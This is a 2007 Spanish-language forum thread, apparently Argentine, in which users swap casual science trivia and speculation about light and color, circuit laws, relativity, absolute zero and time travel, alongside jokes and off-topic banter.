Muy buena teoria... pero... ser cierta?... A que nivel me ilumino? xD... Llegaremos todos al nirvana?... Este post lo cerraran por desvirtuar?... mmm vealo en los siguientes post :P

Mathutito
20/05/2007, 17:57
Si juntas muchos los ojos podes quedar bizco

Listo no me pidan mas ¬¬

Akira
20/05/2007, 23:05
Con dos manos saka callos :P

Zagarth
20/05/2007, 23:24
Con dos manos saka callos :P

WHAT ARE YOU TALKIN' ABOUT WILLIS???

Es sobre eso???

Bue, ahora con una mano sola:smoke1:

SteveShang
21/05/2007, 09:41
Muy buena teoria... pero... ser cierta?... A que nivel me ilumino? xD... Llegaremos todos al nirvana?... Este post lo cerraran por desvirtuar?... mmm vealo en los siguientes post :P

mmmm Akira creo q no lo cerraran ^^ porque ninguno desvirtuo (gracias a Dios) esto practicamente es para q cada uno tire sus teorias mas interesantes y analizarlas con los demas :o :ready:

daron_92
25/05/2007, 16:49
jajajaj
callos?
XD

http://www.pokeyplay.com/imagenes/adopcion/img/aWQ9ODIxNzM=.png
(http://www.pokeyplay.com/diversion_adopcion.php?Q=aWQ9ODIxNzM=)

Zagarth
25/05/2007, 17:11
También te salen pelos en la mano (?)

SteveShang
26/05/2007, 05:20
se imaginan si no existiera el sol ? :o

freedom
26/05/2007, 15:34
se imaginan si no existiera el sol ? :o
No me lo imagino porque teoricamente no hubiera vida, por lo que no existiria como para imaginarlo.....

O sea que la vida sin el sol es imposible (segun los cientificos)

suerte en la vida

freedom
26/05/2007, 15:38
Freud decia q Marxs era un enfermo, mas enfermo sos vos Freud q con el complejo de edipo, inventaste una forma de serruchar con tu madre!
Sory por el doble post, pero tengo que SALVAR ESTO....

ES MUY VERDAD!!!!!!!!!!!!!!

Suerte en la vida

Zagarth
26/05/2007, 15:55
Se imaginan como sería la Argentina si no hubiesen matado en la dictadura a todas las mentes brillantes que este país dio?

SteveShang
26/05/2007, 21:37
y uno se imagina muchas cosas compadre ^^ aproposito para los q no saben soy Ninja en ya saben donde :P , weno cuando quieran pasen por ahi , PlayOnline Rulz y Electrodj Rulz ;)

alucard_66
27/05/2007, 01:18
[QUOTE=Zagarth;466538]Yo creí que era una variante en la percepción humana que varia según la persona.

O sea que nosotros percibimos los colores y en realidad no existen?



En realidad los colores dependen de la luz bajo la cual este el objeto en cuestion. Por ejemplo sabes que la luz blanca se compone por 7 colores, si vos pones una manzana bajo la luz blanca y la ves roja, es porque de los 7 colores de la luz el cuerpo de la manzana absorbe 6 y refleja el rojo; si pones esa manzana en un cuarto cerrado donde la unica fuente de luz es una lampara verde, vas a ver a la manzana de color negro, porque no hay luz roja que ese cuerpo pueda reflejar.

De forma mas detallada, la luz es una forma de energia que viaja en forma de onda, la luz blanca es una señal que puede descomponerse en 7 ondas diferentes, cada onda representa a un color, y estas ondas tienen frecuencias diferentes, y por lo tanto longitudes de onda diferentes. Entonces cuando la luz blanca llega al cuerpo de la manzana la energia de 6 de las 7 ondas reverberan a nivel atomico y son absorbidas por los atomos que componen la manzana, mientras que la onda que tus ojos "identifican" como rojo no reverbera y no es absorbida, sino que se refleja. La energia de las ondas absorbidas se disipa en forma de calor, pero este calor es tan minusculo, que no somos capaces de sentirlo, si no me equivoco esta en el orden de los 10 a la 8 grados celsius, o sea 0,00000005 grados.

Cuando ves un objeto de un color que no es el del arco iris (bajo luz blanca), es porque hay mas de un color que se refleja, o dicho de otra forma, hay mas de una señal que no reverbera y se refleja del cuerpo, esas señales se suman formando una nueva y cuando llegan a tus ojos tu cerebro la interpreta con un color determinado. Por ejemplo el rosa, se refleja gran parte de la energia de la onda de color rojo, y en menor medida la de los otros colores.
Y si ves un cuerpo negro, es porque no refleja ninguna onda, sino que las absrobe todas.

alucard_66
27/05/2007, 01:41
ley de ohm ....
La intensidad que circula por un circuito es proporcional intensidad e inversamente proporcional a la resistencia ...
osea
I=E/R

ley de kirchoff

la sama de la caidas de tencion de cada rasistecia es igual a la caida de tension total del circuito

U=U1+U2+U....

ley de newton

1ra no puedes tocar sin ser tocado

2da.. la matoria de las fuerzas de un objeto es igual a su masa por su aceleracion

bueh basta ..

PD: como ven .. voy a una escuela tecnica ... Otto Krause! =)



ME ALEGRO POR VOS, LASTIMA QUE HALLAS ENUNCIADO MAL TODAS LAS LEYES. :ranting2:

LEY DE OHM:

I = E / R
O sea, la Intensidad de corriente (I) que circula a traves de un circuito es directamente proporcional a la diferencia de potencial (E) aplicada a los bornes del circuito e inversamente proporcional a la resistencia (R) del intercambio entre atomos de cargas electricas.

Leyes de Kirchoff, son dos:

1) La suma de las caidas de potencial en una malla cerrada es igual a cero
2) La suma de las corrientes que entran a un nodo es igual a la suma de las corrientes que salen

Ley de Newton

1) Para toda accion hay una reaccion, o sea que si tiras una pelota contra una pared, la pelota ejerce una fuerza sobre la pared, y la pared ejerce una fuerza de la misma intesidad, pero de sentido opuesto sobre la pelota.
2) La fuerza aplicada a un cuerpo es igual a la masa del cuerpo por la aceleracion que se le imprime al mismo (F = m x a)

YO TAMBIEN FUI A UN COLEGIO TECNICO, EL IPEM NRO 60 MARIANO MORENO (COSQUIN, CORDOBA), QUE AUNQUE NO ES TAN FAMOSO COMO EL OTTO KRAUSSE, PUEDO DECIR CON ORGULLO QUE EL REFRAN TIENE RAZON. No importa donde lo aprendas, sino qué aprendas. :laugh:

alucard_66
27/05/2007, 01:47
Fijate y buscalo, busca la definicon de ilusion optica... y fijate por que los perros ven en blanco y negro... Los colores lo crea el cerebro como una ilusion optica...

Saben por que los perros no pueden ver tele y ven que la luz de nuestras lamparitas parpadean? Facil, las lamparitas se mantienen incandecentes ( para nuestra vista), pero en realidad titilan, por que la frecuencia de una onda electrica es de 50 hertz a -50, por eso, cuando hace el cambio de onda, el filamento se prende y apaga, pero los eprros al tener una persistencia retiniana mas chica, por lo que hace ver ese cambio de frecuencia, lo msimo con los televisores, ellos ven todo como con llovizna y todo rapido, por que su rapidez para "captar" la imagen es ams rapida que la nuestra

Disiento con lo primero, los perros ven en blanco y negro porque no poseen los conos, que son las celulas nerviosas que nos permiten identificar los colores, las personas poseemos los bastoncitos y los conos, que nos permiten distinguir entre diferentes grises y los colores, y los colores no son una ilusion optica, fijate 2 threads mas atras que explico sobre la percepcion de los colores.

alucard_66
27/05/2007, 01:52
entonces porq cuando filmas la tele se ve todo mal?

Eso es porque la pantalla de television crea la imagen a partir de un barrido de minimo 24 veces por segundo, cuando lo filmas con una camara y ves el parpadeo es porque el barrido de la camara que usa para grabar la imagen no esta sincronizado con el barrido de la pantalla de tv, o sea si la tv barre a 24 cuadros por segundo, y la camara a 22 vas a notar un parpadeo.

alucard_66
27/05/2007, 01:58
en saint seiya hyoga lo logra .... fuera de joda ... en una universidad de yanquilandia lo hicieron se lo llama cero absoluto .... es la temperatura mas baja q se pudo llegar! si no no tiene sentido :yu:

El cero absoluto no se pudo alcanzar todavia -.-, una temperatura muy cercana si, pero no el 0º K, y cuando llegues teoricamente toda interaccion entre particulas subatomicas se detiene.

alucard_66
27/05/2007, 02:01
El tema, es que si lo aceleras, y le bajas la tem, aumentas masa tb, por lo que vas a necesitar mayor aceleracion y menos temp...
Lo que siempre fue una teoria, que tenian muchas personas, era que si llegaban a ese cero absoluto o a la vel e la luz, pasas automaticamente a otro universo O.o.
Mi teoria es, qeu si llegas al cero absoluto el cuerpo deja de moverse, los electrones tarian quietas, por ende el cuerpo desapareceria, ( acuerdense que el mayor porsentaje de un atomo es espacio vacio, que el eletro a moverse muy rapido, "estaria" en todos los puntos de ese atomo), entonces al no tener mov, ese espacio vacio no se ocuparia por electrones, y desapareceria o quedaria un cuerpo de infimas dimensiones...
Y la otra teoria es que si llegas a la vel de la luz, verias todo oscuro, ya que vos serias mas rapido que la luz, lo mismo pasa con el sonido al pasar la vle de este...

EDIT: me encantan estas cosas >.<



Segun la teoria de la relatividad, la velocidad de la luz no puede ser superada, y cuando llegas a viajar a la misma velocidad que la luz el tiempo se detiene

Zagarth
27/05/2007, 02:04
Me parece que me cambio a la tecnica... Aprendo mas.

alucard_66
27/05/2007, 02:05
Lo googleaste no? asi cualquiera...:sniper:

NO NECESARIAMENTE, YO ME LO ACUERDO DE MEMORIA :O

.Eriol.
27/05/2007, 02:11
Que una chica se llame DEBORA es una cosa, que le apoden "DEBORADORA", es otra.

sepanlo. @_@ (y aprendan algo de esto)

Tolkien invento los Hobbits, George Lucas invento "LOS EWOKS".

Chuwaka no tiene ningun parentesco o relacion familiar con "el tio cosa".

Zagarth
27/05/2007, 02:15
Se llama Chewbacca :afro:

Ewoks feos no se les entiende un *****.

alucard_66
27/05/2007, 02:37
Segun la teoria de la relatividad (ademas de la famosa y archiconocida ecuacion e=mc2) el tiempo es relativo. A medida que te acercas a la velocidad de la luz el tiempo se va deteniendo, y cuando llegas a la velocidad de la luz (300.000 km/seg) el tiempo se detiene totalmente para vos y no envejeces. Si estas cerca de la velocidad de la luz lo que para vos transcurre como 1 segundo para el resto del universo pueden ser 1000 años, y nada puede superar la velocidad de la luz.
Eso explicaria el viaje en el tiempo, podes viajar al futuro, porque el tiempo transcurre normalmente para todos excepto para vos.

Otra cosa para saber es que la luz y la energia electromagnetica (EM) y el sonido se mueven a diferentes velocidades de acuero al medio en el que esten.

**en el vacio: luz y onda EM se mueven a 300.000 km/seg, el sonido no puede desplazarse en el vacio
**en un cable de cobre: la onda EM se mueve a 200.000 km/seg
**en el aire a condiciones normales de presion y temperatura: el sonido a 365 metros/seg y la luz igual que en el vacio

El sonido no puede desplazarse en el vacio porque no hay un cuerpo fisico que se comprima y expanda. Por ejemplo aca en la tierra si gritamos y nos escuchan a 10 metros es porque al gritar provocamos una compresion en la masa de aire que esta frente a nuestra boca, esta comprime a la masa de aire que esta enfrente suya, y esta a la que esta enfrente, asi sucesivamente, a medida que el sonido se desplaza se va atenuando por diferentes motivos.

La llama de un encendedor es mas caliente en la parte externa que el centro, porque hay menos aire para consumir en el centro que alrededor de la llama. En el centro ronda los 300º Celsius, mientras que en la parte de afuera ronda los 700º Celsius

Con un solo beso se transmiten mas de 40.000 bacterias a la boca del otro.

Y ya no se me ocurre mas nada interesante por ahora, aparte tengo sueño.:mfr_lol:

demon_cry
27/05/2007, 03:06
yo fui a escuela tecnica y no me acuerdo un carajo, ni me interesa acordarme


electronica de mierda ¬¬



alguien q me explique q carajo es una armonica (no es instrumento musical) y con palabras q sean entendibles y no con un copy paste de la wikipedia

SteveShang
27/05/2007, 17:46
sa no rinde Wikipedia o Googlear eso no rinde :D .
supuestamente era para los conocimientos de cada uno

Saludos.

Magick
27/05/2007, 18:01
Segun la teoria de la relatividad (ademas de la famosa y archiconocida ecuacion e=mc2) el tiempo es relativo. A medida que te acercas a la velocidad de la luz el tiempo se va deteniendo, y cuando llegas a la velocidad de la luz (300.000 km/seg) el tiempo se detiene totalmente para vos y no envejeces. Si estas cerca de la velocidad de la luz lo que para vos transcurre como 1 segundo para el resto del universo pueden ser 1000 años, y nada puede superar la velocidad de la luz.
Eso explicaria el viaje en el tiempo, podes viajar al futuro, porque el tiempo transcurre normalmente para todos excepto para vos.
Otra cosa para saber es que la luz y la energia electromagnetica (EM) y el sonido se mueven a diferentes velocidades de acuero al medio en el que esten.

**en el vacio: luz y onda EM se mueven a 300.000 km/seg, el sonido no puede desplazarse en el vacio
**en un cable de cobre: la onda EM se mueve a 200.000 km/seg
**en el aire a condiciones normales de presion y temperatura: el sonido a 365 metros/seg y la luz igual que en el vacio

El sonido no puede desplazarse en el vacio porque no hay un cuerpo fisico que se comprima y expanda. Por ejemplo aca en la tierra si gritamos y nos escuchan a 10 metros es porque al gritar provocamos una compresion en la masa de aire que esta frente a nuestra boca, esta comprime a la masa de aire que esta enfrente suya, y esta a la que esta enfrente, asi sucesivamente, a medida que el sonido se desplaza se va atenuando por diferentes motivos.

La llama de un encendedor es mas caliente en la parte externa que el centro, porque hay menos aire para consumir en el centro que alrededor de la llama. En el centro ronda los 300º Celsius, mientras que en la parte de afuera ronda los 700º Celsius

Con un solo beso se transmiten mas de 40.000 bacterias a la boca del otro.

Y ya no se me ocurre mas nada interesante por ahora, aparte tengo sueño.:mfr_lol:


Segun la teoria relativista el viaje en el tiempo es imposible. Ya uqe no podes ir mas rapido que la luz, y en caso de hacer el viaje en el tiempo solo podrias viajar al futuro.


Segun la Mecanica cuantica es posible viajar en el tiempo, pero solo al pasado, ya que la informacion de lo que sucedio ya se encuentra en el universo. Ahora con eso podriamos viajar al "tiempo 0" que es donde se origino el universo ( no voy a tocar la teoria del Big Bang por uqe no es necesario, y para esta teoria no es necesaria ) podriamos crear un "circulo del tiempo" y asi se podria por primera ves inverla la causa-efecto, ya que primero generariamos un efecto y luego una causa.

Pd: Si queres busca esta teoria en cualquier lado y no la vas a encotrar, por uqe es creacion propia, y solo me falta los respaldos matematicos.

Pd2: La teoria relativista no sirve para viajar en el tiempo, ya uqe este solo se dilata o expande, no podes pegar un salto del año 1 al año 5 sin pasar por lo demas.

Pd3: El viaje en el tiempo es demostrable en la mecanica cuantica, es la unica que lo respalda y nos permite creer en eso.

Pd4: Si te interesa el tema te recomiendo que leas algo de mecanica cuantica o fisica cuantica, el principio de la insertibundre explica todo.

Pd5: Me fui a la mier.. con las post data.

Saludos

daron_92
27/05/2007, 18:28
ayer fui a bailar por primera vez
tubo re bueno y a la salida a uno le encajaron una piña y despues empezo a tener combulciones fue re feo pobrecito



http://www.pokeyplay.com/imagenes/adopcion/img/aWQ9ODIxNzM=.png
(http://www.pokeyplay.com/diversion_adopcion.php?Q=aWQ9ODIxNzM=)

http://www.avataresyfirmas.com/fondoscreados2/956225666669.jpg (http://www.avataresyfirmas.com)

SteveShang
27/05/2007, 18:28
che alguno me passa su msn ? :D necesito ayuda para algo: o

Akira
27/05/2007, 18:52
Cual es el sentido de este post?... ni ganas d eir a la primera pagian xD

acidburn
27/05/2007, 22:57
se imaginan si no existiera el sol ? :o

Si tenes esa grado de dudas filosoficas ( la duda es la base de la filosofia) lee el libro "La Edad del Futuro 2" y el 1 tambien, son de Isaac Asimov, te aseguro que te va a encantar, yo lei cada historia de ese libro unas 10 veces cada una y jamas me cansan, el tipo no escribio historias al boleo sino q esta todo fundamentado cientifica y filosoficamenta , del 1 al 10 le doy un 100 . Fuera de joda, a mi me gusta coleccionar libros ( y leerlos por supuesto XD) y ese es uno de los 3 mejores q tengo.

.Eriol.
27/05/2007, 23:54
Cual es el sentido de este post?... ni ganas d eir a la primera pagian xD

Eso que ven ahi arriba, muy posiblemente se llame desvirtuar (por que no se interesa por el tema, pero igual postea). :mf_gentleman:

Antes de besar a alguien que te gusta, comete unas buenas mentas, el 70% de esta estrategia esta basado en que podemos meter la lengua en la boca de la chica que nos gusta haciendo eso y que al final nos diga "ahh, que rico!". :clapping: (probalo, por el bien de tú aliento y él de ella)

leayoo
28/05/2007, 10:57
para mi viajar al futuro es posible...porque si ves la pelicula volver al futuro te daras cuent de que se podra(?)

carlitoscs1
28/05/2007, 12:01
ley de ohm ....
La intensidad que circula por un circuito es proporcional intensidad e inversamente proporcional a la resistencia ...
osea
I=E/R

ley de kirchoff

la sama de la caidas de tencion de cada rasistecia es igual a la caida de tension total del circuito

U=U1+U2+U....

ley de newton

1ra no puedes tocar sin ser tocado

2da.. la matoria de las fuerzas de un objeto es igual a su masa por su aceleracion

bueh basta ..

PD: como ven .. voy a una escuela tecnica ... Otto Krause! =)

Groso,yo tengo que rendir dos materias y me recibo de tecnico electronico en el krause :D
Mas tarde te van a decir que la ley de Ohm que conoces no es la correcta,ya que la ley de Ohm enuncia "La intensidad que circula por un circuito es directamente proporcional a la tension aplicada al mismo e inversamente proporcional a la resistencia,siempre y cuando el circuito este a temperatura constante"
Es una boludes pero si conoces al profesor Ordoñez,te va a saltar con eso xD
Saludos

Lord Cygnus
29/05/2007, 06:47
Dios mio he desperdiciado 10 segundos de mi vida leyendo esto :P total lo y va a perder XD

SteveShang
03/06/2007, 01:24
eso creo porque no sabes nada de nada (?) :o

Zagarth
03/06/2007, 02:16
Bue, si desaceleras al 0 absoluto para mi que realizarias un "viaje en el tiempo y espacio", ya que por la misma inercia del movimiento, el cuerpo tenderia a avanzar, y al no poder, se encontraria en una posicion en la cual la masa se veria aumentada en un volumen muy elevado (no se si infinito), y al esta ya no moverse absolutamente como que se veria paralizado el tiempo para el objeto en cuestion, posiblemente redireccionandose a otro lugar, no por el movimiento del objeto, sino por el de todos los demas.

En definitiva, quedarias en otro dimension/universo paralelo, para mi al menos.

Otra opcion es que haya una colision interna masiva, teninedo una capacidad destructiva inimaginable, o sea que le kbe a la galaxia. (masa aumenta hasta punto critico en la cual implosiona)

Otra opcion es que no pase nada y que simplemente el chavon vea y diga: "uhhhh, que locooooO!!!!!, demos otra vuelta!!!!!!!!!"

Suerte en la vida

Pero si se queda duro se va a otra dimensión? en todo caso se queda duro y queda ahí, todo se le hace asi como "que todo se mueve infinitamente a las chapas alrededor" y el quietito.

DEMOS OTRA VUELTA WIIIII!!!

SteveShang
03/06/2007, 04:53
weno yo creo que un viaje en el espacio no seria posible porque despues de la peli volver al futuro si mas no recuerdo realizaron varios experimentos fallidos y no se pudo concretar esa idea, por la cual muchos la dejaron de lado, en cuando a viajar en el tiempo por la velocidad de la luz tampoco se podria porque todo lo que seria masa al llegar a esa velocidad en menos de 5 segundos de lograrla quedaria hecha polvo xD

Zagarth
03/06/2007, 04:58
weno yo creo que un viaje en el espacio no seria posible porque despues de la peli volver al futuro si mas no recuerdo realizaron varios experimentos fallidos y no se pudo concretar esa idea, por la cual muchos la dejaron de lado, en cuando a viajar en el tiempo por la velocidad de la luz tampoco se podria porque todo lo que seria masa al llegar a esa velocidad en menos de 5 segundos de lograrla quedaria hecha polvo xD

Se haría energía.

SteveShang
03/06/2007, 14:03
gracias eso era lo que no me acordaba xD

Saludos.

rogelio123
04/06/2007, 18:12
la educacion no es cara si en cambio la ignorancia. bernardo husay.
magick tenes mas de una profesora de matematica que bajon XD.

SteveShang
04/06/2007, 20:09
jajajajaj alguien una vez dijo: Anoche estaba en mi cama mirando hacia el cielo y pensando "Donde esta el techo "?

Saludos.

Tenkaichi
04/06/2007, 22:10
Dios mio he desperdiciado 10 segundos de mi vida leyendo esto :P total lo y va a perder XD



Ya veo porque escribis tan mal:thumbsdown:, consideras al aprendizaje una perdida de tiempo.:thumbsdown:

La frase se escribe asi:

lo iba a perder

:google_lt:

gonza25
04/06/2007, 22:52
El viaje en el tiempo es totalmente posible solamente q no sabrias como volver, por q...si vos viajas al pasado y volves al presente estarias en el presente q creaste al volver al pasado :S medio dificil de entender.

SteveShang
04/06/2007, 22:53
Congratulations Tenkaichi bien ahi yo creo que no me habia acordado de ese tipo, onda que pierde tiempo leyendo cosas que a muchos les puede ayudar en tema colegio o universidad =? este tipo no va al cole, y si va, a calentar el Asiento

Saludos.

Akira
04/06/2007, 23:15
Mucha gente va al cole a calentar la silla.. todo depende que tan interesante sea el tema... ^^...